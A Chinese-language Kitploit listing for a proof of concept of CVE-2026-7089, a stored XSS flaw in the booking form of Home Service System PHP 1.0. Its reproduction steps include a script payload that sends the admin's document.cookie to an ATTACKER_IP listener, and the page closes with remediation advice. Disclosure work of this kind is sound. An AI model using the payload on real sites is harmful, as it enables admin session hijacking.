Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-7089-XSS — CVE-2026-7089 的概念验证,Home Service System PHP 1.0 中的存储型 XSS,可通过预订表单在未认证的情况下劫持管理员会话。 | Kitploit
工具/GitHubGitHub/xmyronn/cve-2026-7089-xss
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubxmyronn/cve-2026-7089-xss

CVE-2026-7089-XSS

CVE-2026-7089 的概念验证,Home Service System PHP 1.0 中的存储型 XSS,可通过预订表单在未认证的情况下劫持管理员会话。

查看仓库
4个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

home-service-system-unauth-stored-xss-admin-takeover

漏洞详情

字段详情
供应商code-projects.org
产品Home Service System In PHP
版本1.0
漏洞类型存储型跨站脚本(XSS)
CWECWE-79
是否需要认证否
作者Imad Alvi

描述

Home Service System In PHP 1.0 的 booking.php 文件中存在存储型跨站脚本(XSS)漏洞。未认证用户可以通过预订表单字段注入恶意 JavaScript 载荷。未经过滤的输入被存储在数据库中,并在管理面板(admin.php)中未经输出编码直接渲染,从而在管理员的浏览器上下文中执行。

这使得未认证攻击者能够窃取管理员会话 Cookie、以管理员身份执行操作,或完全接管管理员账户。


受影响组件

  • 文件: booking.php
  • 参数: fname、lname
  • 汇聚点: admin.php → 管理预订

复现步骤

  1. 以未认证用户身份导航至预订页面: http://TARGET/homeservices/booking.php?provider=

    Screenshot 2026-04-08 221145
  2. 在名字字段中注入以下载荷:

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
  1. 使用任意有效数据填写其余字段并提交预订。

  2. 在攻击者机器上启动监听器:

root@kitploit:~
php -S 0.0.0.0:PORT
  1. 等待管理员访问 admin.php 中的管理预订部分。

  2. 载荷在管理员的浏览器中执行,将会话 Cookie 外泄至你的监听器。

    Screenshot 2026-04-08 221158
Screenshot 2026-04-08 221214

概念验证

载荷(弹窗)

root@kitploit:~
<script>alert(1)</script>
Screenshot 2026-04-08 220538

载荷(会话劫持)

root@kitploit:~
<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>

影响

该漏洞允许远程未认证攻击者完全攻陷应用程序。

攻击者可以:

  • 在管理员的浏览器中执行任意 JavaScript
  • 窃取管理员的 PHPSESSID 会话 Cookie
  • 劫持管理员会话并获得完全的管理员访问权限
  • 执行任意管理操作(管理预订、服务商等)

这将导致应用程序被完全攻陷。

修复建议

  • 在存储或渲染所有用户提供的输入之前,使用 htmlspecialchars() 配合 ENT_QUOTES 进行过滤
  • 实施内容安全策略(CSP)响应头
  • 在服务端验证并清理所有表单输入

参考

  • Home Service System In PHP - code-projects.org
下载工具